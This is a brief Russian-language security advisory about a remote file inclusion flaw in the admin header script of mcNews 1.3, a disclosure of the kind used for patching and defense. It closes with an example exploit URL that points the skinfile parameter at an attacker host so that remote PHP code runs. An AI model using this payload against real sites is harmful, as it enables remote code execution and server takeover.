Программа: mcNews 1.3
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.
Уязвимость существует в сценарии 'mcNews/admin/header.php' из-за недостаточной фильтрации входных данных в переменной skinfile. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе.
Пример:
http://[target]/[dir]/mcNews/admin/header.php?skinfile=http://[attacker]/
